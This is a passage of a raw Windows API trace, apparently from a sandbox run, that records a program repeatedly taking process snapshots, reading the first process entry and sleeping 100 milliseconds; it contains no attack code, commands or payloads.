cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.515] Sleep (dwMilliseconds=0x64) [0256.523] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.541] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.624] Sleep (dwMilliseconds=0x64) [0256.628] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.644] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.707] Sleep (dwMilliseconds=0x64) [0256.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.732] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.806] Sleep (dwMilliseconds=0x64) [0256.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.820] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.883] Sleep (dwMilliseconds=0x64) [0256.885] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0256.900] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.971] Sleep (dwMilliseconds=0x64) [0256.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.015] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.079] Sleep (dwMilliseconds=0x64) [0257.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.096] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.169] Sleep (dwMilliseconds=0x64) [0257.171] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.184] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.271] Sleep (dwMilliseconds=0x64) [0257.276] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.289] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.363] Sleep (dwMilliseconds=0x64) [0257.366] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.381] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.456] Sleep (dwMilliseconds=0x64) [0257.459] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.476] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.547] Sleep (dwMilliseconds=0x64) [0257.552] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.567] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.636] Sleep (dwMilliseconds=0x64) [0257.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.654] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.713] Sleep (dwMilliseconds=0x64) [0257.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.730] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.794] Sleep (dwMilliseconds=0x64) [0257.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.812] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.882] Sleep (dwMilliseconds=0x64) [0257.888] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0257.903] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.974] Sleep (dwMilliseconds=0x64) [0257.982] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.017] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.071] Sleep (dwMilliseconds=0x64) [0258.073] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.084] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.148] Sleep (dwMilliseconds=0x64) [0258.150] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.160] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.228] Sleep (dwMilliseconds=0x64) [0258.232] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.244] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.300] Sleep (dwMilliseconds=0x64) [0258.333] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.348] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.421] Sleep (dwMilliseconds=0x64) [0258.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.435] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.499] Sleep (dwMilliseconds=0x64) [0258.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.517] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.586] Sleep (dwMilliseconds=0x64) [0258.587] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.599] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.677] Sleep (dwMilliseconds=0x64) [0258.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.694] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.764] Sleep (dwMilliseconds=0x64) [0258.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.781] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.846] Sleep (dwMilliseconds=0x64) [0258.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0258.860] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.017] Sleep (dwMilliseconds=0x64) [0259.019] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0259.028] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.069] Sleep (dwMilliseconds=0x64) [0262.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0262.205] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.301] Sleep (dwMilliseconds=0x64) [0262.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0262.317] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.392] Sleep (dwMilliseconds=0x64) [0262.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0262.412] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.536] Sleep (dwMilliseconds=0x64) [0262.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0262.560] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.640] Sleep (dwMilliseconds=0x64) [0262.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0262.670] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.747] Sleep (dwMilliseconds=0x64) [0262.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0262.784] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.882] Sleep (dwMilliseconds=0x64) [0262.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0262.940] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.055] Sleep (dwMilliseconds=0x64) [0263.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.071] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.132] Sleep (dwMilliseconds=0x64) [0263.135] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.150] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.233] Sleep (dwMilliseconds=0x64) [0263.238] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.247] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.305] Sleep (dwMilliseconds=0x64) [0263.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.321] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.397] Sleep (dwMilliseconds=0x64) [0263.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.421] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.494] Sleep (dwMilliseconds=0x64) [0263.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.512] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.584] Sleep (dwMilliseconds=0x64) [0263.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.602] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.672] Sleep (dwMilliseconds=0x64) [0263.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.692] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.767] Sleep (dwMilliseconds=0x64) [0263.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.788] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.858] Sleep (dwMilliseconds=0x64) [0263.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.873] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.939] Sleep (dwMilliseconds=0x64) [0263.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0263.951] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.030] Sleep (dwMilliseconds=0x64) [0264.032] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.045] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.095] Sleep (dwMilliseconds=0x64) [0264.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.112] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.180] Sleep (dwMilliseconds=0x64) [0264.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.222] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.285] Sleep (dwMilliseconds=0x64) [0264.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.302] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.371] Sleep (dwMilliseconds=0x64) [0264.377] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.388] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.521] Sleep (dwMilliseconds=0x64) [0264.526] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.538] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.590] Sleep (dwMilliseconds=0x64) [0264.593] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.605] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.657] Sleep (dwMilliseconds=0x64) [0264.660] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.671] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.722] Sleep (dwMilliseconds=0x64) [0264.724] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.733] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.786] Sleep (dwMilliseconds=0x64) [0264.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.802] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.859] Sleep (dwMilliseconds=0x64) [0264.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.874] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.923] Sleep (dwMilliseconds=0x64) [0264.925] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0264.934] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.986] Sleep (dwMilliseconds=0x64) [0265.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0265.025] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 